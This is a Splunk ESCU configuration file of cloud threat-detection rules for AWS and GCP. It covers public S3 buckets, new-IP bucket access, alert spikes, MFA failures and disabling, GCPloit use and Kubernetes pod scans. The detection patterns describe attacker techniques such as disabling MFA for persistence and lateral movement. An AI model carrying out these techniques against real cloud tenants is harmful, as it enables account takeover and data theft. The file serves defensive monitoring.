[ESCU - Detect New Open S3 Buckets over AWS CLI - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket over the aws cli.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket over the aws cli.
action.escu.how_to_implement =
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created a public bucket for a specific purpose. That said, AWS strongly advises against granting full control to the "All Users" group.
action.escu.creation_date = 2021-07-19
action.escu.modification_date = 2021-07-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect New Open S3 Buckets over AWS CLI - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious AWS S3 Activities"]
action.risk = 1
action.risk.param._risk_message = User $userIdentity.userName$ has created an open/public bucket $bucketName$ using AWS CLI with the following permissions - $requestParameters.accessControlList.x-amz-grant-read$ $requestParameters.accessControlList.x-amz-grant-read-acp$ $requestParameters.accessControlList.x-amz-grant-write$ $requestParameters.accessControlList.x-amz-grant-write-acp$ $requestParameters.accessControlList.x-amz-grant-full-control$
action.risk.param._risk = [{"risk_object_field": "userIdentity.userName", "risk_object_type": "other", "risk_score": 48}, {"risk_object_field": "bucketName", "risk_object_type": "other", "risk_score": 48}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect New Open S3 Buckets over AWS CLI - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket over the aws cli.
action.notable.param.rule_title = Detect New Open S3 Buckets over AWS CLI
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventSource="s3.amazonaws.com" (userAgent="[aws-cli*" OR userAgent=aws-cli* ) eventName=PutBucketAcl OR requestParameters.accessControlList.x-amz-grant-read-acp IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write-acp IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-full-control IN ("*AuthenticatedUsers","*AllUsers") | rename requestParameters.bucketName AS bucketName | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userIdentity.userName userIdentity.principalId userAgent bucketName requestParameters.accessControlList.x-amz-grant-read requestParameters.accessControlList.x-amz-grant-read-acp requestParameters.accessControlList.x-amz-grant-write requestParameters.accessControlList.x-amz-grant-write-acp requestParameters.accessControlList.x-amz-grant-full-control | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_new_open_s3_buckets_over_aws_cli_filter`

[ESCU - Detect S3 access from a new IP - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks at S3 bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed an S3 bucket.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks at S3 bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed an S3 bucket.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your S3 access logs' inputs. This search works best when you run the "Previously Seen S3 Bucket Access by Remote IP" support search once to create a history of previously seen remote IPs and bucket names.
action.escu.known_false_positives = S3 buckets can be accessed from any IP, as long as it can make a successful connection. This will be a false positive, since the search is looking for a new IP within the past hour.
action.escu.creation_date = 2018-06-28
action.escu.modification_date = 2018-06-28
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect S3 access from a new IP - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious AWS S3 Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Detect S3 access from a new IP - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `aws_s3_accesslogs` http_status=200 [search `aws_s3_accesslogs` http_status=200 | stats earliest(_time) as firstTime latest(_time) as lastTime by bucket_name remote_ip | inputlookup append=t previously_seen_S3_access_from_remote_ip | stats min(firstTime) as firstTime, max(lastTime) as lastTime by bucket_name remote_ip | outputlookup previously_seen_S3_access_from_remote_ip | eval newIP=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newIP=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table bucket_name remote_ip] | iplocation remote_ip | rename remote_ip as src_ip | table _time bucket_name src_ip City Country operation request_uri | `detect_s3_access_from_a_new_ip_filter`

[ESCU - Detect Spike in AWS Security Hub Alerts for EC2 Instance - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for a spike in the number of AWS Security Hub alerts for an EC2 instance in 4-hour intervals
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for a spike in the number of AWS Security Hub alerts for an EC2 instance in 4-hour intervals
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your Security Hub inputs. The threshold_value should be tuned to your environment and schedule these searches according to the bucket span interval.
action.escu.known_false_positives = None
action.escu.creation_date = 2021-01-26
action.escu.modification_date = 2021-01-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Spike in AWS Security Hub Alerts for EC2 Instance - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["AWS Security Hub Alerts"]
action.risk = 1
action.risk.param._risk_message = Spike in AWS security Hub alerts with title $Title$ for EC2 instance $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Spike in AWS Security Hub Alerts for EC2 Instance - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Security Hub Alerts"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `aws_securityhub_finding` "Resources{}.Type"=AWSEC2Instance | bucket span=4h _time | stats count AS alerts values(Title) as Title values(Types{}) as Types values(vendor_account) as vendor_account values(vendor_region) as vendor_region values(severity) as severity by _time dest | eventstats avg(alerts) as total_alerts_avg, stdev(alerts) as total_alerts_stdev | eval threshold_value = 3 | eval isOutlier=if(alerts > total_alerts_avg+(total_alerts_stdev * threshold_value), 1, 0) | search isOutlier=1 | table _time dest alerts Title Types vendor_account vendor_region severity isOutlier total_alerts_avg | `detect_spike_in_aws_security_hub_alerts_for_ec2_instance_filter`

[ESCU - Detect Spike in AWS Security Hub Alerts for User - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for a spike in the number of AWS Security Hub alerts for an AWS IAM User in 4-hour intervals.
action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for a spike in the number of AWS Security Hub alerts for an AWS IAM User in 4-hour intervals.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your Security Hub inputs. The threshold_value should be tuned to your environment and schedule these searches according to the bucket span interval.
action.escu.known_false_positives = None
action.escu.creation_date = 2021-01-26
action.escu.modification_date = 2021-01-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Spike in AWS Security Hub Alerts for User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["AWS Security Hub Alerts"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Detect Spike in AWS Security Hub Alerts for User - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Security Hub Alerts"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `aws_securityhub_finding` "findings{}.Resources{}.Type"= AwsIamUser | rename findings{}.Resources{}.Id as user | bucket span=4h _time | stats count AS alerts by _time user | eventstats avg(alerts) as total_launched_avg, stdev(alerts) as total_launched_stdev | eval threshold_value = 2 | eval isOutlier=if(alerts > total_launched_avg+(total_launched_stdev * threshold_value), 1, 0) | search isOutlier=1 | table _time user alerts | `detect_spike_in_aws_security_hub_alerts_for_user_filter`

[ESCU - Detect Spike in blocked Outbound Traffic from your AWS - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search will detect a spike in blocked outbound network connections originating from within your AWS environment. It will also update the cache file that factors in the latest data.
action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search will detect a spike in blocked outbound network connections originating from within your AWS environment. It will also update the cache file that factors in the latest data.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your VPC Flow logs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the number of data points required to meet the definition of "spike." The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of Blocked Outbound Connection" support search once to create a history of previously seen blocked outbound connections.
action.escu.known_false_positives = The false-positive rate may vary based on the values of `dataPointThreshold` and `deviationThreshold`. Additionally, false positives may result when AWS administrators roll out policies enforcing network blocks, causing sudden increases in the number of blocked outbound connections.
action.escu.creation_date = 2018-05-07 action.escu.modification_date = 2018-05-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Spike in blocked Outbound Traffic from your AWS - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Network ACL Activity", "Suspicious AWS Traffic", "Command And Control"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Spike in blocked Outbound Traffic from your AWS - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Network ACL Activity", "Suspicious AWS Traffic", "Command And Control"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12 OR src_ip=192.168.0.0/16) ( dest_ip!=10.0.0.0/8 AND dest_ip!=172.16.0.0/12 AND dest_ip!=192.168.0.0/16) [search `cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12 OR src_ip=192.168.0.0/16) ( dest_ip!=10.0.0.0/8 AND dest_ip!=172.16.0.0/12 AND dest_ip!=192.168.0.0/16) | stats count as numberOfBlockedConnections by src_ip | inputlookup baseline_blocked_outbound_connections append=t | fields - latestCount | stats values(*) as * by src_ip | rename numberOfBlockedConnections as latestCount | eval 
newAvgBlockedConnections=avgBlockedConnections + (latestCount-avgBlockedConnections)/720 | eval newStdevBlockedConnections=sqrt(((pow(stdevBlockedConnections, 2)*719 + (latestCount-newAvgBlockedConnections)*(latestCount-avgBlockedConnections))/720)) | eval avgBlockedConnections=coalesce(newAvgBlockedConnections, avgBlockedConnections), stdevBlockedConnections=coalesce(newStdevBlockedConnections, stdevBlockedConnections), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table src_ip, latestCount, numDataPoints, avgBlockedConnections, stdevBlockedConnections | outputlookup baseline_blocked_outbound_connections | eval dataPointThreshold = 5, deviationThreshold = 3 | eval isSpike=if((latestCount > avgBlockedConnections+deviationThreshold*stdevBlockedConnections) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | table src_ip] | stats values(dest_ip) as "Blocked Destination IPs", values(interface_id) as "resourceId" count as numberOfBlockedConnections, dc(dest_ip) as uniqueDestConnections by src_ip | `detect_spike_in_blocked_outbound_traffic_from_your_aws_filter` [ESCU - Detect Spike in S3 Bucket deletion - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search detects users creating spikes in API activity related to deletion of S3 buckets in your AWS environment. It will also update the cache file that factors in the latest data. 
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search detects users creating spikes in API activity related to deletion of S3 buckets in your AWS environment. It will also update the cache file that factors in the latest data. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required to have a statistically significant amount of data to determine. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of S3 Bucket deletion activity by ARN" support search once to create a baseline of previously seen S3 bucket-deletion activity. action.escu.known_false_positives = Based on the values of`dataPointThreshold` and `deviationThreshold`, the false positive rate may vary. Please modify this according the your environment. 
action.escu.creation_date = 2018-11-27 action.escu.modification_date = 2018-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Spike in S3 Bucket deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS S3 Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Spike in S3 Bucket deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=DeleteBucket [search `cloudtrail` eventName=DeleteBucket | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup s3_deletion_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | 
table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup s3_deletion_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | spath output=bucketName path=requestParameters.bucketName | stats values(bucketName) as bucketName, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_s3_bucket_deletion_filter` [ESCU - GCP Authentication Failed During MFA Challenge - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an authentication attempt event against a Google Cloud Platform tenant that fails during the Multi Factor Authentication challenge. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an authentication attempt event against a Google Cloud Platform tenant that fails during the Multi Factor Authentication challenge. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. Specifically, this analytic leverages the User log events. 
action.escu.known_false_positives = Legitimate users may miss to reply the MFA challenge within the time window or deny it by mistake. action.escu.creation_date = 2024-01-04 action.escu.modification_date = 2024-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Authentication Failed During MFA Challenge - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ failed to pass MFA challenge action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GCP Authentication Failed During MFA Challenge - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an authentication attempt event against a Google Cloud Platform tenant that fails during the Multi Factor Authentication challenge. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. 
action.notable.param.rule_title = GCP Authentication Failed During MFA Challenge action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | stats count min(_time) as firstTime max(_time) as lastTime by user, src_ip, login_challenge_method | `gcp_authentication_failed_during_mfa_challenge_filter` [ESCU - GCP Detect gcploit framework - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of GCPloit exploitation framework. This framework can be used to escalate privileges and move laterally from compromised high privilege accounts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]} action.escu.data_models = ["Email"] action.escu.eli5 = This search provides detection of GCPloit exploitation framework. This framework can be used to escalate privileges and move laterally from compromised high privilege accounts. action.escu.how_to_implement = You must install splunk GCP add-on. 
This search works with gcp:pubsub:message logs action.escu.known_false_positives = Payload.request.function.timeout value can possibly be match with other functions or requests however the source user and target request account may indicate an attempt to move laterally accross acounts or projects action.escu.creation_date = 2020-10-08 action.escu.modification_date = 2020-10-08 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Detect gcploit framework - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Cross Account Activity"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - GCP Detect gcploit framework - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search provides detection of GCPloit exploitation framework. This framework can be used to escalate privileges and move laterally from compromised high privilege accounts. 
action.notable.param.rule_title = GCP Detect gcploit framework action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.request.function.timeout=539s | table src src_user data.resource.labels.project_id data.protoPayload.request.function.serviceAccountEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.request.location http_user_agent | `gcp_detect_gcploit_framework_filter` [ESCU - GCP Kubernetes cluster pod scan detection - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster's pods action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster's pods action.escu.how_to_implement = You must install the GCP App for Splunk (version 2.0.0 or later), then configure stackdriver and set a Pub/Sub subscription to be imported to Splunk. action.escu.known_false_positives = Not all unauthenticated requests are malicious, but frequency, User Agent, source IPs and pods will provide context. 
action.escu.creation_date = 2020-07-17 action.escu.modification_date = 2020-07-17 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Kubernetes cluster pod scan detection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Kubernetes Scanning Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - GCP Kubernetes cluster pod scan detection - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` category=kube-audit |spath input=properties.log |search responseStatus.code=401 |table sourceIPs{} userAgent verb requestURI responseStatus.reason properties.pod | `gcp_kubernetes_cluster_pod_scan_detection_filter` [ESCU - GCP Multi-Factor Authentication Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an attempt to disable multi-factor authentication for a GCP user. An adversary who has obtained access to an GCP tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an attempt to disable multi-factor authentication for a GCP user. An adversary who has obtained access to an GCP tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. Specifically, this analytic leverages the Admin log events. action.escu.known_false_positives = Legitimate use case may require for users to disable MFA. Filter as needed. 
action.escu.creation_date = 2024-01-04 action.escu.modification_date = 2024-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Multi-Factor Authentication Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Account Takeover"] action.risk = 1 action.risk.param._risk_message = MFA disabled for User $user$ initiated by $actor.email$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"risk_object_field": "actor.email", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GCP Multi-Factor Authentication Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an attempt to disable multi-factor authentication for a GCP user. An adversary who has obtained access to an GCP tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. 
